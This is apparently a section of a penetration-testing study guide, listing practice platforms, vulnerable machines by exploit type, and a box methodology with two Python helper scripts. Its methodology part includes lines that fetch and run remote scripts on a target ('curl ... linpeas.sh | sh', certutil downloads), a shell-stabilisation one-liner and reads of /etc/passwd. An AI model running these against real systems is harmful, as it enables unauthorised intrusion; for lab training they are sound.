Reading about exploitation is not the same as doing it. Every concept in this guide exists to be practiced — on real vulnerable machines, in real environments, against real services. This section covers every platform worth your time, how to approach them effectively, and which machines to start with based on what you are trying to learn. The methodology at the end applies everywhere — how you approach a box matters as much as what techniques you know.
🔰 Beginners: Start with HackTheBox Starting Point or TryHackMe. Both are designed for people who are new and provide guided paths. Do not start with a hard box and get discouraged — the easy boxes teach everything you need to progress.
⚡ Seasoned practitioners: The machine curation by exploit type and the Pro Labs section are the most relevant parts. Skip to Machine Curation for the indexed list.
Before you start — know these terms:
- Retired machine — a box that has been taken out of active rotation on HTB. Walkthroughs and writeups are publicly available. Good for learning because you can get help when stuck.
- Active machine — currently on the platform. No official writeups — you are on your own. Points count toward rank.
- Starting Point — HTB's guided beginner path. Machines come with questions that walk you through the techniques step by step.
- VIP — paid tier on HTB. Gives access to all retired machines and less crowded servers.
- Pro Labs — full simulated enterprise networks on HTB. Multiple machines, Active Directory, realistic corporate environments.
- HackTheBox
- TryHackMe
- HackTheBox Academy
- PentesterLab
- OffSec Proving Grounds
- VulnHub
- PortSwigger Web Security Academy
- Machine Curation by Exploit Type
- How to Approach a Box — The Methodology
- Tracking Your Progress
What it is: The industry standard for CTF-style penetration testing practice. Individual machines running real operating systems with real services, each designed around a specific exploitation path or chain. Completing boxes builds technical skill faster than almost anything else.
URL: hackthebox.com
Free tier:
→ Access to active machines
→ Starting Point machines (guided)
→ Limited retired machine access
→ Shared servers
VIP ($14/month):
→ All retired machines
→ Dedicated servers (less lag, more reliable)
→ Essential for serious practice
VIP+ ($20/month):
→ Everything in VIP
→ Access to more Pro Labs
→ Priority support
Starting Point is HTB's guided beginner path. Each machine comes with a series of questions that walk you through the exploitation steps. This is not hand-holding — it is structured learning that builds methodology.
Tier 0 — Absolute beginner:
Meow → Telnet, default credentials
Fawn → FTP enumeration, anonymous login
Dancing → SMB enumeration, null session
Redeemer → Redis, unauthenticated access
Explosion → RDP, default credentials
Preignition → Web enumeration, default credentials
Tier 1 — Basic exploitation:
Appointment → SQL injection, basic web
Sequel → MySQL, SQL fundamentals
Crocodile → FTP + web, credential reuse
Responder → LLMNR/NBT-NS poisoning, Windows
Three → S3 bucket, cloud basics
Ignition → Web, default credentials
Tier 2 — Intermediate chains:
Archetype → MSSQL, xp_cmdshell, Windows privesc
Oopsie → Web, IDOR, SUID privesc
Vaccine → SQL injection, config files, sudo
Unified → Log4Shell CVE-2021-44228
Included → LFI, TFTP, LXD privesc
Markup → XXE, Windows scheduled tasks
Base → Web, login bypass, SUID privesc
Easy machines:
→ One or two steps to user, one step to root
→ One main vulnerability — find it, exploit it
→ Good for practicing specific techniques
Medium machines:
→ Usually a chain of 2-3 vulnerabilities
→ Require enumeration across multiple services
→ More realistic than easy boxes
Hard machines:
→ Complex chains, custom exploits, obscure techniques
→ May require modifying public exploits significantly
→ Sometimes require developing tools or scripts
Insane machines:
→ Intended for experienced practitioners
→ Often involve cutting-edge CVEs or novel techniques
→ Can take days — not appropriate for beginners
Pro Labs are full network environments, not single machines. They simulate realistic corporate environments with Active Directory, multiple interconnected hosts, and real-world attack paths.
Dante → Beginner-friendly network, pivoting basics
→ Good first Pro Lab after some HTB experience
Offshore → Intermediate, Active Directory focused
→ Realistic corporate network simulation
RastaLabs → Advanced, heavy Active Directory exploitation
→ Credential attacks, lateral movement, persistence
Cybernetics → Advanced, modern enterprise simulation
→ EDR, AV, advanced defense bypass required
APTLabs → Expert level, APT simulation
→ Nation-state level techniques required
What it is: Browser-based learning platform focused on guided learning paths. Machines can be accessed directly in the browser without a VPN. Better for absolute beginners than HTB because of the structured guided approach.
URL: tryhackme.com
No VPN setup required — browser-based machines
Guided rooms with step-by-step instructions
Learning paths organized by topic and skill level
More explanations alongside the challenges
Free tier is generous — many rooms completely free
Complete Beginner:
→ Linux Fundamentals (3 parts)
→ Web Fundamentals
→ Network Fundamentals
→ How The Web Works
Pre-Security:
→ Introduction to Cybersecurity
→ Network Security
→ Web Application Security
Jr Penetration Tester:
→ Full path covering methodology through reporting
→ Hands-on rooms for each technique
→ Certificate on completion
SOC Level 1:
→ Defensive side — understanding what defenders see
→ Valuable context for offensive practitioners
Buffer Overflow Prep → Classic Windows BoF practice
Steel Mountain → HackTheBox-style Windows box
Blue → EternalBlue (MS17-010) exploitation
Ice → Windows exploitation chain
Relevant → Windows enumeration and exploitation
Skynet → Linux web exploitation chain
Mr Robot CTF → Fun themed Linux box
RootMe → Basic Linux web shell upload
Simple CTF → Beginner Linux box
Pickle Rick → Fun beginner web box
What it is: HTB's structured learning platform. Not CTF boxes — theory and guided modules with hands-on exercises. Think of it as the textbook that goes alongside the practice.
URL: academy.hackthebox.com
Penetration Testing Process → Full methodology overview
Network Enumeration with Nmap → Everything nmap
Footprinting → Comprehensive enumeration techniques
Information Gathering → OSINT and passive recon
Vulnerability Assessment → Finding and prioritizing vulns
Web Requests → HTTP fundamentals
Web Application Attacks → SQLi, XSS, command injection, LFI
Attacking Web Applications with Ffuf → Web fuzzing
File Upload Attacks → File upload exploitation
SQL Injection Fundamentals → SQLi from zero
Linux Privilege Escalation → Full privesc methodology
Windows Privilege Escalation → Full Windows privesc
Active Directory Enumeration and Attacks → AD fundamentals
Password Attacks → Credential attacks, hash cracking
Shells and Payloads → Shell generation and management
Introduction to Assembly → Understand what exploits do
Stack-Based Buffer Overflows (Linux) → Linux BoF
Stack-Based Buffer Overflows (Windows) → Windows BoF
What it is: Web application security focused practice platform. Exercises are organized by vulnerability class with excellent explanations of the underlying concepts. Strong on web vulnerabilities and cryptography.
URL: pentesterlab.com
Excellent explanations alongside exercises
Organized by CVE and vulnerability class
Real web application vulnerabilities — not contrived
Strong cryptography and encoding exercises
Good for web-focused practitioners
Pro subscription required for most content (~$20/month)
Web for Pentester I & II → Comprehensive web basics
SQL Injection → Every SQLi type with explanation
File Upload → Upload bypass techniques
XXE → XML External Entity exploitation
Padding Oracle → Cryptographic attack
JWT → JSON Web Token attacks
Code Execution → RCE techniques
What it is: OffSec's practice platform — the same organization behind OSCP. Two tiers: Play (free) and Practice (paid). Practice machines are the closest thing to OSCP exam machines available.
URL: portal.offsec.com/labs/practice
OffSec maintains it — same difficulty and style as OSCP exam
Practice tier machines are rated Easy/Intermediate/Hard
Community solutions available for retired machines
Essential if preparing for OSCP
Closer to OSCP exam difficulty than HTB machines
Play (free):
→ Limited set of machines
→ Community rated boxes
→ Good for casual practice
Practice ($19/month):
→ Full library of machines
→ OffSec-rated difficulty
→ Hints available
→ Essential for OSCP preparation
What it is: Free downloadable vulnerable virtual machines. Run them locally in VirtualBox or VMware. No subscription required — everything is free. Ideal for offline practice or when you want full control over the environment.
URL: vulnhub.com
Completely free — no subscription
Run locally — no VPN, no internet required
Full control — can snapshot and revert anytime
Massive library — hundreds of machines
Community walkthroughs available for all machines
Good for slow, thorough learning without time pressure
```bash
# Requirements:
# VirtualBox (free): virtualbox.org
# Or VMware Workstation Player (free): vmware.com

# Download a .ova or .vmdk file from vulnhub.com

# Import into VirtualBox:
# File → Import Appliance → select the .ova file

# Network setup:
# Set the vulnerable VM to Host-Only networking
# Set your Kali VM to Host-Only networking
# Both machines can communicate, neither reaches the internet

# Find the target IP (192.168.56.0/24 is VirtualBox's default host-only range):
sudo netdiscover -r 192.168.56.0/24   # option 1
sudo arp-scan -l                      # option 2
nmap -sn 192.168.56.0/24              # option 3
```

Beginner:
Kioptrix Level 1 → Classic beginner Linux box
Mr-Robot → TV show themed, 3 flags
Basic Pentesting 1 → Good methodology practice
pWnOS 2.0 → Web application focus
Intermediate:
Brainpan → Buffer overflow focused
SkyTower → SSH, SQL, enumeration chain
HackLAB: Vulnix → NFS, Linux privesc
Stapler → Multiple services, chain
Buffer Overflow Practice:
Brainpan 1, 2, 3 → Dedicated BoF practice machines
dostackbufferoverflowgood → Excellent BoF learning machine
What it is: Free web application security training from the creators of Burp Suite. The most comprehensive free web security learning resource available. Every major web vulnerability class covered with theory, labs, and solutions.
URL: portswigger.net/web-security
Completely free — no subscription required
Best-in-class explanations of web vulnerabilities
Browser-based labs — no setup required
Progressive difficulty — apprentice to expert
Covers every web vulnerability in depth
Certificate of completion available
Server-side vulnerabilities:
→ SQL injection (18 labs)
→ Authentication (14 labs)
→ Path traversal (6 labs)
→ Command injection (5 labs)
→ Business logic vulnerabilities (11 labs)
→ Information disclosure (5 labs)
→ Access control (13 labs)
→ File upload vulnerabilities (7 labs)
→ Server-side request forgery (7 labs)
→ XXE injection (9 labs)
Client-side vulnerabilities:
→ Cross-site scripting (30 labs)
→ Cross-site request forgery (12 labs)
→ Clickjacking (5 labs)
→ DOM-based vulnerabilities (7 labs)
→ WebSockets (3 labs)
Advanced topics:
→ Insecure deserialization (10 labs)
→ GraphQL API vulnerabilities (5 labs)
→ Server-side template injection (7 labs)
→ Web cache poisoning (13 labs)
→ HTTP request smuggling (22 labs)
→ OAuth authentication (6 labs)
→ JWT attacks (8 labs)
→ Prototype pollution (10 labs)
Use this index to find practice machines for specific techniques covered in this guide.
Buffer overflows:
HTB:
Brainfuck → Advanced — Linux BoF component
October → Linux BoF
Pincer → Windows BoF
VulnHub:
Brainpan 1 → Classic Windows BoF — best beginner BoF box
dostackbufferoverflowgood → Excellent teaching machine
Tr0ll 3 → Linux BoF
TryHackMe:
Buffer Overflow Prep → 10 practice targets with guidance
Gatekeeper → Windows BoF
Brainstorm → Windows BoF
SQL injection:
HTB Starting Point:
Appointment → Basic SQLi
Sequel → MySQL direct access
HTB:
Nightmare → Advanced SQLi
Magic → SQLi to file upload chain
PortSwigger:
All SQL injection labs → Comprehensive coverage of every type
DVWA (standalone):
SQL Injection module → Multiple difficulty levels
SQL Injection (Blind) module → Boolean and time-based
Command injection and file upload:
HTB:
Bashed → Web shell, command injection
Networked → Command injection via file upload
Beep → RCE via multiple paths
TryHackMe:
RootMe → File upload to RCE
Vulnversity → File upload bypass
PortSwigger:
Command injection labs → All injection types
File inclusion (LFI/RFI):
HTB:
Poison → LFI to credential disclosure
Nineveh → LFI chaining
File → LFI focused box
TryHackMe:
File Inclusion → Dedicated LFI/RFI room with guidance
PentesterLab:
File Include exercises → Good explanations alongside labs
SSRF:
HTB:
Gobox → SSRF to AWS metadata
Bucket → SSRF to internal service
Forge → SSRF with filter bypass
PortSwigger:
SSRF labs → All SSRF types including blind
Deserialization:
HTB:
Arkham → Java deserialization
Cereal → PHP deserialization
Pikaboo → Deserialization component
PortSwigger:
Insecure deserialization labs → PHP, Java, Ruby coverage
Active Directory:
HTB Pro Labs:
Offshore → Intermediate AD network
RastaLabs → Advanced AD exploitation
HTB:
Forest → AD enumeration, AS-REP roasting
Active → Kerberoasting, GPP passwords
Resolute → AD enumeration, DnsAdmins privesc
Sauna → AS-REP roasting, DCSync
Monteverde → Azure AD, password spraying
TryHackMe:
Active Directory Basics → Guided introduction
Attacktive Directory → Intermediate guided AD room
Windows exploitation:
HTB:
Blue → EternalBlue MS17-010
Legacy → MS08-067
Devel → IIS file upload, Windows privesc
Optimum → HFS RCE, Windows privesc
Bastard → Drupal RCE, Windows privesc
Grandpa/Granny → IIS WebDAV exploitation
TryHackMe:
Blue → EternalBlue guided
Steel Mountain → HFS exploitation guided
Ice → Windows exploitation chain
Linux privilege escalation:
HTB:
Beep → Multiple privesc paths
Bashed → sudo abuse
Cronos → Cron job abuse
Shocker → Shellshock, sudo
Nibbles → Web app, sudo privesc
TryHackMe:
Linux PrivEsc → Dedicated privesc room
Common Linux Privesc → All main techniques
VulnHub:
Kioptrix series → Classic Linux boxes
pWnOS series → Web to root chains
This methodology applies to every platform. Follow it consistently and you will develop the systematic thinking that gets through hard boxes.
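The steps that follow start from an nmap scan and then enumerate every service it found. As an added example that is not part of this guide, here is a small Python script that parses nmap's normal (`-oN`) output and turns it into that per-service checklist using the same commands the steps use; the scan text is constructed, the target address 10.10.10.5 is a placeholder, and the command templates are this example's own, not nmap's or any tool's.

```python
"""
Turn `nmap -oN` output into the per-service enumeration checklist the
methodology describes. Added example: the scan text below is constructed,
and the command templates are the guide's own commands, not tool output.
"""
import re
from dataclasses import dataclass

# Constructed sample of `nmap -sV -sC --top-ports 1000 -oN quick.txt` output (not a real scan).
SAMPLE_NMAP = """\
# Nmap 7.94 scan initiated Mon Jan  1 12:00:00 2024 as: nmap -sV -sC --top-ports 1000 -oN quick.txt 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up (0.041s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE    SERVICE      VERSION
21/tcp   open     ftp          vsftpd 3.0.3
22/tcp   open     ssh          OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp   open     http         Apache httpd 2.4.41 ((Ubuntu))
| http-title: Welcome
|_Requested resource was /index.php
445/tcp  open     microsoft-ds Samba smbd 4.6.2 (workgroup: WORKGROUP)
3306/tcp filtered mysql
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# A port line in normal output: "<port>/<proto>  <state>  <service>  [<version banner>]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


@dataclass
class Service:
    port: int
    proto: str
    name: str      # nmap's service name (http, ftp, microsoft-ds, ...)
    version: str   # product/version banner; empty when nmap could not fingerprint it


def parse_nmap_normal(text):
    """Return open ports only; filtered/closed ports and NSE script lines are skipped."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m and m.group(3) == "open":
            port, proto, _state, name, version = m.groups()
            services.append(Service(int(port), proto, name, version.strip()))
    return services


def product_and_version(banner):
    """Cut 'Apache httpd 2.4.41 ((Ubuntu))' down to 'Apache httpd 2.4.41' for searchsploit."""
    words = []
    for tok in banner.split():
        words.append(tok)
        if tok[0].isdigit():   # first token carrying a version number ends the product name
            break
    return " ".join(words)


# Enumeration commands from Step 4 of the methodology, keyed by nmap service name.
WORDLIST = "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt"
SERVICE_CHECKS = {
    "http":  [f"gobuster dir -u http://{{ip}}:{{port}} -w {WORDLIST} -x php,html,txt,bak -o gobuster_{{port}}.txt"],
    "https": [f"gobuster dir -u https://{{ip}}:{{port}} -k -w {WORDLIST} -x php,html,txt,bak -o gobuster_{{port}}.txt"],
    "ftp":   ["ftp {ip}  # try anonymous / anonymous"],
    "microsoft-ds": ["smbclient -L //{ip} -N", "enum4linux -a {ip}"],
    "netbios-ssn":  ["smbclient -L //{ip} -N", "enum4linux -a {ip}"],
}


def build_checklist(services, ip):
    """Fingerprinted services first (searchsploit has something to search), then by port; no duplicate commands."""
    steps = []
    for s in sorted(services, key=lambda s: (s.version == "", s.port)):
        if s.version:
            steps.append(f"searchsploit {product_and_version(s.version)}")
        for tpl in SERVICE_CHECKS.get(s.name, []):
            cmd = tpl.format(ip=ip, port=s.port)
            if cmd not in steps:   # 139 and 445 would otherwise queue enum4linux twice
                steps.append(cmd)
    return steps


if __name__ == "__main__":
    found = parse_nmap_normal(SAMPLE_NMAP)
    for step in build_checklist(found, "10.10.10.5"):
        print(step)
```

Run it against your own `quick.txt` by swapping `SAMPLE_NMAP` for the file contents; the filtered 3306 port is deliberately dropped so the checklist only contains services you can actually talk to.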
```bash
# Step 1 — Quick scan to see what is there
nmap -sV -sC --top-ports 1000 TARGET_IP -oN quick.txt

# Step 2 — Full port scan running in the background
nmap -sV -sC -p- --min-rate 5000 TARGET_IP -oN full.txt &

# Step 3 — UDP scan for key ports (raw sockets, so it needs root)
sudo nmap -sU --top-ports 20 TARGET_IP -oN udp.txt &

# Step 4 — While scans run, enumerate what you already found
# Web on 80/443?
gobuster dir -u http://TARGET_IP \
  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
  -x php,html,txt,bak -o gobuster.txt

# FTP on 21?
ftp TARGET_IP                # try anonymous / anonymous

# SMB on 445?
smbclient -L //TARGET_IP -N
enum4linux -a TARGET_IP
```

```bash
# For each service found:
# 1. Note the exact version
# 2. Search for vulnerabilities
searchsploit SERVICE VERSION
# 3. Google: SERVICE VERSION exploit
# 4. Check if Metasploit has a module
msfconsole -q -x "search SERVICE; exit"

# Prioritize:
# → RCE vulnerabilities over information disclosure
# → Unauthenticated over authenticated
# → Public exploit available over manual research required
```

```bash
# Try the most promising vector first
# Follow the exploit exactly as written initially
# If it fails — debug systematically (see when-it-fails/debugging.md)

# When you get a shell:
# 1. Stabilize immediately
python3 -c 'import pty; pty.spawn("/bin/bash")'
# 2. Grab the flag (CTF)
cat /home/*/user.txt 2>/dev/null
# 3. Confirm your position
whoami && id && hostname
```

```bash
# Linux — automated enumeration first
# Upload and run LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Or upload manually
# On your machine:
python3 -m http.server 80
# On target:
curl http://YOUR-IP/linpeas.sh | sh

# Manual checks alongside automated:
sudo -l                                   # what can you run as sudo?
find / -perm -4000 -type f 2>/dev/null    # SUID binaries
crontab -l; cat /etc/crontab              # cron jobs (';' so the second runs even with no user crontab)
grep -v nologin /etc/passwd               # users with shells
ls -la /home/                             # other user home directories

# Windows — automated enumeration
# Upload and run WinPEAS
# From your machine:
python3 -m http.server 80
# On target (cmd.exe):
#   certutil -urlcache -f http://YOUR-IP/winPEAS.exe winpeas.exe
#   .\winpeas.exe
```

```bash
# After completing the box:
# 1. Write up what you found in order
# 2. Note what you tried that did not work and why
# 3. Note what you would do differently
# 4. Screenshot or log key commands and outputs

# A box you completed and documented
# is worth 10 boxes you completed and forgot
```

What to track:
For each box completed:
□ Platform and machine name
□ Difficulty rating
□ Date completed
□ Initial access technique used
□ Privilege escalation technique used
□ Key lessons learned
□ Time taken
□ Did you get stuck? Where? How did you get unstuck?
Why tracking matters:
Most people complete boxes and move on. Three months later they cannot remember how they got through a specific technique or what they learned. A simple log — even just a text file or a notes app — turns individual box completions into a searchable knowledge base.
The writeup habit:
Writing a walkthrough of a completed box is the single most effective way to consolidate learning. You do not have to publish it. Writing it for yourself forces you to articulate every step — and gaps in your understanding show up immediately when you cannot explain what you did and why.
Minimum writeup structure:
1. What services were running
2. How you got initial access — technique (what worked and what didn't)
3. How you escalated privileges — technique (what worked and what didn't)
4. What you learned
5. What you would do faster next time (where did you waste time)
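The tracking checklist and the minimum writeup structure above fit in one plain text file. As an added example that is not part of this guide, here is a Python script that keeps the log as JSON Lines (one record per box, with the fields from the checklist), searches it by technique, summarises where you get stuck, and renders the five-point writeup skeleton from a record; the field names and the three sample entries are constructed for the example.

```python
"""
A plain-text practice log: one JSON object per line, with the fields from
the "What to track" checklist, plus search, summary and a writeup skeleton.
Added example; field names and sample entries are constructed.
"""
import json
from collections import Counter

FIELDS = ("platform", "machine", "difficulty", "date", "initial_access",
          "privesc", "lessons", "minutes", "stuck_at", "unstuck_by")

# Constructed sample log: three made-up entries in the format append_entry() writes.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"platform": "HTB", "machine": "Example-1", "difficulty": "Easy", "date": "2024-01-05",
     "initial_access": "anonymous FTP, credential reuse", "privesc": "sudo misconfiguration",
     "lessons": "check sudo -l before anything else", "minutes": 95,
     "stuck_at": "", "unstuck_by": ""},
    {"platform": "THM", "machine": "Example-2", "difficulty": "Easy", "date": "2024-01-12",
     "initial_access": "file upload to web shell", "privesc": "SUID binary",
     "lessons": "enumerate the upload handler before guessing", "minutes": 140,
     "stuck_at": "upload filter", "unstuck_by": "re-read the room hint"},
    {"platform": "HTB", "machine": "Example-3", "difficulty": "Medium", "date": "2024-02-02",
     "initial_access": "SQL injection", "privesc": "sudo misconfiguration",
     "lessons": "enumerate every parameter, not just the login form", "minutes": 260,
     "stuck_at": "privesc", "unstuck_by": "re-ran sudo -l as the second user"},
])


def make_entry(**fields):
    """Build one record: unknown keys are refused, missing ones filled with blanks (0 for minutes)."""
    unknown = set(fields) - set(FIELDS)
    if unknown:
        raise ValueError(f"unknown fields: {sorted(unknown)}")
    return {k: fields.get(k, 0 if k == "minutes" else "") for k in FIELDS}


def append_entry(path, entry):
    """Append one record to the log file; JSON Lines keeps it grep-able and diff-friendly."""
    with open(path, "a", encoding="utf-8") as fh:
        fh.write(json.dumps(entry) + "\n")


def parse_log(text):
    """Read JSON Lines text back into a list of records; blank lines are ignored."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def search(entries, keyword):
    """Case-insensitive match over the technique, lesson and stuck fields."""
    kw = keyword.lower()
    hay = ("initial_access", "privesc", "lessons", "stuck_at")
    return [e for e in entries if any(kw in str(e[f]).lower() for f in hay)]


def summarize(entries):
    """Technique frequency, sticking points and average time: the things worth revisiting."""
    return {
        "boxes": len(entries),
        "initial_access": Counter(e["initial_access"] for e in entries),
        "privesc": Counter(e["privesc"] for e in entries),
        "stuck": [(e["machine"], e["stuck_at"]) for e in entries if e["stuck_at"]],
        "avg_minutes": round(sum(e["minutes"] for e in entries) / len(entries)) if entries else 0,
    }


def writeup_skeleton(entry):
    """Render the minimum writeup structure, pre-filled with what the log already knows."""
    return "\n".join([
        f"# {entry['platform']} / {entry['machine']} ({entry['difficulty']}, {entry['date']})",
        "1. Services running: ",
        f"2. Initial access: {entry['initial_access']}",
        f"3. Privilege escalation: {entry['privesc']}",
        f"4. Learned: {entry['lessons']}",
        f"5. Faster next time: {entry['unstuck_by'] or 'n/a'}",
    ])


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    print(summarize(entries))
    print(writeup_skeleton(entries[-1]))
```

Point `append_entry` at a file such as `boxes.jsonl` and `parse_log(open("boxes.jsonl").read())` gives you the searchable knowledge base the section describes; `summarize` is what tells you, three months later, which privesc technique you have actually practised and which one keeps stopping you.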
| Resource | What It Covers |
|---|---|
| Vuln Research | Finding exploits for what you discover |
| Manual Exploitation | Running exploits when automated fails |
| Shells | Getting and keeping access |
| When It Fails | Getting unstuck on boxes |
| Exploit Categories | Deep dives on every technique |
by SudoChef · Part of the SudoCode Pentesting Methodology Guide